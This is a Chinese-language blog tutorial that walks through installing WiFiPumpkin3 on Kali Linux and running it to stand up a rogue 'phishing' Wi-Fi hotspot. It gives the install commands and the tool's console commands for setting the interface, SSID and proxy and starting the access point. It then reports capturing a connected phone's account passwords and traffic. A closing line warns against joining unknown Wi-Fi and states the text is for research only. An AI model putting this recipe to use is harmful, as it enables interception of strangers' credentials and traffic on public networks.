前言

釣魚wifi是很久的話題了，但是傳統的方法可能比較麻煩需要手動配置dhcp，dns，網絡卡，流量轉發，比較麻煩，而且還有根據每次的網路環境需要重新的配置，這裡介紹用WIFIpumpkin3工具簡單快速的搭建釣魚wifi

WIFIpumpkin3的安裝

WIFIpumpkin3依託的是python來構建dns，dhcp所以需要python環境且python環境要大於3.7，目前似乎不支援windows和mac，我用的kali上面已經集成了python3.8的環境，所以就不介紹python>=3.7的安裝了，需要的自行百度，下面的操作都是在kali2020.2上其他環境的安裝參考官方文件WIFIpumpkin3

python安裝依賴

sudo apt install libssl-dev libffi-dev build-essential

安裝git，kali中似乎已經整合

apt-get install git

下載WIFIpumpkin3

選擇合適的目錄

git clone https://github.com/P0cL4bs/wifipumpkin3.git

下載完畢進入目錄

cd wifipumpkin3

安裝PyQt5

sudo apt install python3-pyqt5

驗證是否安裝成功，如果列印了done則表示安裝成功

python3 -c "from PyQt5.QtCore import QSettings; print('done')"
 

編譯安裝WIFIpumpkin3

sudo python3 setup.py install

如果顯示下圖這樣就代表安裝成功了

WIFIpumpkin3建立釣魚wifi

啟動wifipumpkin3

wifipumpkin3

設定網絡卡這裡的網絡卡同樣要具備ap模擬的網絡卡，wlan0為你的網絡卡

set interface wlan0 

設定wifi名稱也就是ssid，demo修改為你要建立的wifi

set ssid demo

設定代理外掛

set proxy noproxy

設定dns

ignore pydns_server

開啟釣魚wifi

start

檢視利用

這裡我們用手機連線一下，發現成功分配ip且有網路

看一下kali，這裡顯示了連線而且顯示了連線的手機的型號

繼續，我們用手機登入一個網站

看一下kali，發現抓取到了賬號密碼，而且還有流量記錄的資訊圖片等等，okwifi釣魚完成

參考文章及說明

上文從滲透的角度說明陌生ifi，攻擊者可以利用樹莓派等小型裝置放入大型的公共場所設定免費公共wifi是非常可怕的，所以提醒最好最好最好(重要的事情說三遍)不要連線陌生的wifi很容易盜取你的資訊
WIFIpumpkin3還有很多用途可以自行探索，本文參考地址:https://wifipumpkin3.github.io/docs/getting-started
最後歡迎訪問我的個人部落格：https://lmg66.github.io/
說明：本文僅限技術研究與討論，嚴禁用於非法用途，否則產生的一切後果自行承擔